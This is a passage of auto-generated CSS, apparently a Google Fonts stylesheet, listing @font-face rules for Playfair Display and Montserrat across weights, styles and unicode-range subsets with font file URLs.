U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 *//* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: 